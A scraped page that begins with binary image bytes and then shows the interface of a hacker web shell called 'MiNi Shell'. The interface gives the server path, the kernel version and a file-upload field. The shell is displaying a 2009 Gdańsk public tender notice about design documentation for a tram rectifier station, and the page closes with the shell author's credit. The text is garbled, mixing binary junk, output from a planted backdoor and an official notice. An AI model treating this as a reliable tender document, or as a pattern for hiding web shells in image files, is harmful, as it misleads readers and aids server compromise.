JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090710/109485-N-2009.html

<p class="kh_header"><b>Gdańsk: OPRACOWANIE KOMPLEKSOWEJ DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA W RAMACH GDAŃSKIEGO PROJEKTU KOMUNIKACJI MIEJSKIEJ III A ZADANIE NR 4.1. BUDOWA STACJI PROSTOWNIKOWEJ BRZEŹNO</b><br>
<b>Numer ogłoszenia: 109485 - 2009; data zamieszczenia: 10.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdańskie Inwestycje Komunalne Euro 2012 Sp. z o.o. , ul. Kartuska 5, 80-103 Gdańsk, woj. pomorskie, tel. 0-58 722 01 00, faks 0-58 722 01 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gikeuro2012.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Celowa Spółka Komunalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE KOMPLEKSOWEJ DOKUMENTACJI PROJEKTOWEJ DLA ZADANIA W RAMACH GDAŃSKIEGO PROJEKTU KOMUNIKACJI MIEJSKIEJ III A ZADANIE NR 4.1. BUDOWA STACJI PROSTOWNIKOWEJ BRZEŹNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie  następujących  prac:

Wykonanie kompleksowej dokumentacji projektowej budowlanej i wykonawczej dla :
- Obiektu kubaturowego z instalacjami podstawowymi i wyposażeniem technicznym stacji
- Robót  związanych  z zagospodarowaniem terenu, w tym dróg, ogrodzenia, ciągów pieszych do budynku, oświetlenia terenu oraz zieleni.
- Zdalnego sterowania stacji  współpracującego z systemem BUSZ-CZAT w Centrum Sterowania TOWAROWA
Opracowanie dokumentacji projektowej składającej się z:
- Projektów budowlanych
- Projektów wykonawczych
- Przedmiarów robót
- Kosztorysów inwestorskich szczegółowych
- Specyfikacji technicznych wykonania i odbioru robót budowlanych
- Informacji dotyczącej bezpieczeństwa i ochrony zdrowia
- Harmonogramu  realizacji w zakresie :elektrycznym, elektroenergetycznym, konstrukcyjnym, teletechnicznym, zagospodarowania terenu, organizacji ruchu na czas budowy  oraz  uzyskanie dla w/w  dokumentacji projektowej  wynikających z przepisów i obowiązującego Prawa Budowlanego: opinii, zgód, uzgodnień i pozwoleń.  

Stacja prostownikowa   zlokalizowana będzie u zbiegu ulic Hallera i  Chrobrego w dzielnicy  Gdańsk Wrzeszcz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.31.00-9, 71.24.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 112.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  8.000,00 zł,  słownie: osiem tysięcy złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	 O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Prawo zamówień publicznych w następujący sposób:

1.1.	posiadają uprawnienia do wykonywania działalności i czynności, obejmujących wykonanie niniejszego zamówienia publicznego, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4.	  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.	Zamawiający uzna, iż powyższe warunki zostały spełnione, jeżeli Wykonawca:

2.1.	w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 (dwie) usługi polegające na wykonaniu dokumentacji projektowej (projekty budowlane i wykonawcze) w zakresie budowy, przebudowy lub modernizacji stacji prostownikowych wraz z uzbrojeniem terenu, o wartości prac projektowych nie mniejszej niż 150.000 zł brutto każda, wraz z potwierdzeniem ich należytej realizacji.
Wraz z ofertą należy złożyć wykaz usług potwierdzających spełnienie warunku, polegających na wykonaniu dokumentacji projektowych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wraz z dokumentami potwierdzającymi należyte wykonanie tych usług (np. referencje) - wzór wykazu stanowi zał. nr 3 do SIWZ.
Dokumenty winny być złożone w formie oryginałów lub kopii potwierdzonych za zgodność z oryginałem przez uprawnionego przedstawiciela wykonawcy.
2.2.	dysponuje lub będzie dysponował osobami posiadającymi niezbędne kwalifikacje i uprawnienia do wykonania przedmiotu zamówienia w tym:
- co najmniej 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wraz z aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego;
- co najmniej 1 osoba posiadająca uprawnienia budowlane w telekomunikacji do projektowania w specjalności instalacyjnej w zakresie sieci, linii, instalacji i urządzeń w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą wraz z aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego; 
- co najmniej 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalnościach drogowej wraz z aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego;
- co najmniej 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalnościach konstrukcyjno-budowlanej wraz z aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego;
- co najmniej 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalnościach sanitarnej tj. instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych wraz z aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego;
Spełnienie warunku poprzez złożenie wraz z ofertą wykazu osób sporządzonego wg wzoru zał. nr 4 do SIWZ wraz z uprawnieniami oraz aktualnym na dzień składania ofert zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego.
W przypadku wskazania w wykazie osób, którymi Wykonawca będzie dysponował w przyszłości, do oferty należy załączyć pisemne zobowiązanie innego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia.
2.3.	udokumentuje posiadanie ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności z kwotą gwarantowaną nie mniejszą niż 500.000 zł. 
Spełnienie warunku poprzez złożenie wraz z ofertą polisy ubezpieczenia, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony w zakresie prowadzonej działalności.
2.4.	oświadczy, że nie podlega wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 Prawa Zamówień Publicznych oraz spełnia warunki art.22 ust.1 ustawy Pzp. 
       	Spełnienie warunku poprzez załączenie do oferty oświadczenia sporządzonego wg wzoru zał. nr 2 do SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp, zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie  wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Wykaz zrealizowanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zamówień polegających na wykonaniu dokumentacji projektowej na potwierdzenie spełnienia warunku, o którym mowa w Części IV pkt 2.1. SIWZ, sporządzony wg wzoru załącznik nr 3 do SIWZ.
8.	Dokumenty potwierdzające, że zawarte w wykazie, o którym mowa w pkt. 7, usługi zostały wykonane należycie (np. referencje).
9.	Wykaz osób, którymi dysponuje Wykonawca na potwierdzenie warunku, o którym mowa w Części IV pkt 2.2. SIWZ, sporządzony wg wzoru załącznik nr 4 do SIWZ. 
10.	Do wykazu osób należy załączyć właściwe uprawnienia budowlane do projektowania oraz aktualne na dzień składania ofert zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego dla osób wskazanych w Części IV pkt 2.2. SIWZ.
11.	Polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej z kwotą gwarantowaną nie mniejszą niż 500.000 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gikeuro2012.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gdańskie Inwestycje Komunalne Euro 2012 Sp. z o.o., ul. Kartuska 5, 80-103 Gdańsk, III piętro, pokoj nr 19, osoba do kontaktu: Iwona Przybyszewska tel. (58) 722 01 11..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 10:00, miejsce: Sekretariat (pok. nr 15, III piętro) siedziby Spółki GIK Euro 2012, ul. Kartuska 5 w Gdańsku..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Unii Europejskiej - Program Operacyjny Infrastruktura i Środowisko. Zamawiający zarejestrował postępowanie pod nr Sygn. akt: PN-11/B/KP3/2009.
Zamawiający przewiduje możliwość dokonania zmian w umowie, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poprzez kolejno numerowane aneksy sporządzone w formie pisemnej pod rygorem nieważności, w następujących przypadkach:
a)	konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
b)	brak jest możliwości dotrzymania przez Wykonawcę terminu wykonania przedmiotu umowy lub poszczególnych opracowań składających się na przedmiot umowy z przyczyn niezależnych od Wykonawcy - w szczególności w przypadkach opóźnień w wydawaniu decyzji, uzgodnień itp. ze strony właściwych organów lub instytucji,
c)	dla właściwej realizacji przedmiotu zamówienia, niezbędne jest ograniczenie przez Zamawiającego zakresu zleconego opracowania z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy,
d)	konieczne jest wprowadzenie zmian w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa obowiązujących po dacie zawarcia umowy, wywołujących potrzebę zmian umowy wraz ze skutkami wprowadzenia takich zmian,
e)	konieczne jest zmniejszenie wynagrodzenia Wykonawcy w przypadku ograniczenia przez Zamawiającego zakresu opracowania z przyczyn, których nie można było przewidzieć w chwili zawierania umowy,
f)	istnieje potrzeba dostosowania wysokości wynagrodzenia Wykonawcy do zmienionej przez ustawodawcę stawki podatku od towarów i usług (VAT),
g)	wystąpiła potrzeba zmiany osoby lub osób wskazanych przez Wykonawcę do realizacji zamówienia, pod warunkiem, że nowo wskazana osoba lub osoby spełniają odpowiednie wymagania, przewidziane dla wykonywanej funkcji, określone w części IV, punkcie 2, podpunkcie 3 SIWZ,
h)	wystąpiła potrzeba zmiany po stronie Zamawiającego osoby lub osób upoważnionych do kontaktów z Wykonawcą,
i)	wystąpiła potrzeba zmiany po stronie Wykonawcy osoby lub osób upoważnionych do kontaktów z Zamawiającym,
j)	wystąpiła potrzeba zmiany podmiotu lub osoby wykonującej w imieniu i na rzecz Zamawiającego wszelkie czynności faktyczne i prawne związane z wykonywaniem umowy,
k)	wystąpiła potrzeba dokonania zmian uzasadnionych okolicznościami, o których mowa w art. 3571 Kodeksu cywilnego bądź innych zmian korzystnych dla Zamawiającego,
l)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian 
zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.
m)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością

Creat By MiNi SheLL
Email: jattceo@gmail.com